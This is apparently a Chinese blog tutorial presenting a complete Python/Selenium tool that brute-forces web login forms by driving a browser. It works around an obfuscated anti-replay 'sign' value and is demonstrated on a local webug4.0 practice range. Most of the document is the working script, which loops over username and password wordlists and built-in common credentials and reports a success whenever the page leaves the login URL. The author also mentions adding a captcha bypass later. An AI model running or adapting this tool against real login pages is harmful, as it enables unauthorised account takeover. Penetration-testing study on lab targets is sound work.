selenium自动化爆破

selenium自动化爆破工具

某一天测试公司某个业务的时候发现,虽然页面没有验证码,但是抓包之后一直有个sign值,而且每次的会话这个值都会变,改了之后后端会报错提示 sign值不合法。

我这暴脾气,立马看源码就准备逆了它,看着就来气。调了半天,woc全tm混淆的,代码读的我眼睛疼。算了,此处不留爷,自有留爷处,从界面下手,直接自动化爆破算了。

虽然网上已经有很多同类的东西了,但自己造轮子才能提高啊,就着手写了。

基础知识+环境配置

我是mac的环境,使用python2.7+chromedriver实现
首先使用homebrew安装chromedriver
brew cask install chromedriver
pip install selenium

至此,环境准备结束,该补充selenium的知识了。

官方手册送上:https://selenium-python.readthedocs.io/
核心知识:
1.elementLocation
2.webdriver

本次的工具主要使用到了元素定位和部分webdriver的功能

过程

本次用webug4.0靶场的登录做例子,其他都一样。

定位

find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector

下面是查找多个元素(这些方法将返回一个列表):
find_elements_by_name
find_elements_by_xpath
find_elements_by_link_text
find_elements_by_partial_link_text
find_elements_by_tag_name
find_elements_by_class_name
find_elements_by_css_selector

username框直接根据name获取定位

password用id或者class定位

1
2
3
username = driver.find_element_by_name("username")  # locate the user field by its name attribute
password = driver.find_element_by_id("doc-ipt-pwd-1")  # locate the password field by id
login_button = driver.find_element_by_class_name("am-btn")  # first element carrying the am-btn class

判断跳转

我的逻辑是判断当前的 URL 和爆破的登录页 URL 是否相同,如果不同,就认为账号密码正确
driver.current_url获取当前URL

效果

速度挺快的,胜在少了逆sign等操作,后续加入bypass极验功能

代码

#coding:utf-8
from selenium import webdriver
import time
import sys
import os

url = "http://172.16.173.159/control/login.php"  # login page under test; normal_test/dict_test compare driver.current_url against it
sample_user = ['admin','admin123','root','administrator','guest','Admin']  # built-in lists for normal_test() (its call in main() is commented out)
sample_pass = ['admin123','123456','a123456','1234abcd','Qwer1234','admin']
driver = webdriver.Chrome()  # NOTE: module-level side effect — Chrome starts at import time, before main() validates argv
driver.get(url)
# driver.find_element_by_css_selector(".js_show_pwd_panel").click()


# def Buster():
# fopen("")

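def getElement():
    """Locate the login form controls on the page currently loaded in ``driver``.

    Returns a 4-tuple ``(status, username, password, login_button)``.
    ``status`` is kept because callers unpack it, but it is always ``True``:
    a failed lookup propagates as the driver's own exception.  The original
    ``try/except Exception as e: raise e`` only re-raised, and in Python 2
    ``raise e`` discards the original traceback, so that wrapper is removed.

    The ``find_element_by_*`` helpers are the Selenium 3 API; Selenium 4
    replaced them with ``find_element(By.X, ...)``.
    """
    # Locators for this target form; the commented lines are alternate locators.
    # username = driver.find_element_by_name("loginUserName")
    # password = driver.find_element_by_name("loginPassword")
    username = driver.find_element_by_name("username")
    password = driver.find_element_by_id("doc-ipt-pwd-1")
    # login_button = driver.find_element_by_id("sublogin")
    login_button = driver.find_element_by_class_name("am-btn")
    return True, username, password, login_button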



def normal_test(sample_user,sample_pass):
    """Submit every (user, password) pair from the two in-memory lists.

    A pair is printed as "success" when, after clicking the button, the
    browser's URL differs from the module-level ``url`` (the page navigated
    away); otherwise it is printed as "fail".  Output carries ANSI colour
    codes.  Relies on the module-level ``driver``/``url`` and on getElement().
    """
    for user in sample_user:
        for passwd in sample_pass:
            ok, user_box, pass_box, submit = getElement()
            if not ok:
                print("get element error~")
            else:
                user_box.clear()
                user_box.send_keys(user)
                pass_box.clear()
                pass_box.send_keys(passwd)
                submit.click()
                # Success heuristic: the page left the login URL.
                navigated_away = driver.current_url != url
                if navigated_away:
                    print('\033[32m[*]Username/Passwprd : %s/%s success' % (user, passwd))
                else:
                    print('\033[32m[*]Username/Passwprd : %s/%s fail' % (user, passwd))
                    # Leftover debug output; original indentation was lost, so
                    # NOTE(review): confirm whether it belongs to the fail branch.
                    print("\033[0;37;40m\tHello World\033[0m")
            # NOTE(review): indentation was lost in the source; the delay is
            # placed once per attempt, mirroring the commented sleep in dict_test.
            time.sleep(0.5)


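def dict_test(users,passwds):
    """Submit every (user, password) pair built from two wordlist line-lists.

    ``users`` and ``passwds`` are raw lines (e.g. from ``readlines()``); each
    value is stripped before use.  Progress is printed as ``[current/total]``
    using the same URL-change success heuristic as normal_test(): red for
    success, green for fail.  Relies on the module-level ``driver``/``url``
    and on getElement().

    Changes from the original: the never-read ``page_status`` flag is dropped
    and ``strip()`` is computed once per value instead of on every print.
    """
    total = len(users) * len(passwds)
    current = 1
    for raw_user in users:
        user = raw_user.strip()
        for raw_pass in passwds:
            passwd = raw_pass.strip()
            status, username, password, login_button = getElement()
            if status:
                username.clear()
                username.send_keys(user)
                password.clear()
                password.send_keys(passwd)
                login_button.click()
                # Success heuristic: navigation away from the login page.  Any
                # response that stays on the login URL (including a server-side
                # lockout after repeated failures) is reported as a plain fail.
                if driver.current_url != url:
                    print("\033[31m[*]"+"Username/Passwprd [%s/%s]: %s/%s success" % (current,total,user,passwd))
                else:
                    print("\033[32m[*]"+"Username/Passwprd [%s/%s]: %s/%s fail" % (current,total,user,passwd))
            else:
                print("get element error~")
            current = current + 1
            # time.sleep(0.5)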


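def main():
    """CLI entry point: ``python rpoBuster.py <userlist> <passwordlist>``.

    Reads both wordlists (one entry per line) and passes them to dict_test().
    Exits with status 1 on a wrong argument count or an unreadable file.
    Note that the module-level code has already launched Chrome and loaded
    ``url`` by the time this runs.
    """
    # normal_test(sample_user,sample_pass)
    if len(sys.argv) != 3:
        print("\t Usage: python rpoBuster.py <userlist> <passwordlist>\n")
        sys.exit(1)
    # `with` closes each handle; the original left both files open.
    try:
        with open(sys.argv[1], "r") as userfile:
            users = userfile.readlines()
    except IOError:
        print("[-] Error: Check your userlist path\n")
        sys.exit(1)
    try:
        with open(sys.argv[2], "r") as passfile:
            passwds = passfile.readlines()
    except IOError:
        print("[-] Error: Check your passwordlist path\n")
        sys.exit(1)
    dict_test(users, passwds)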

if __name__ == "__main__":
    # Script guard; note that importing the module still starts Chrome (see the top-level code).
    main()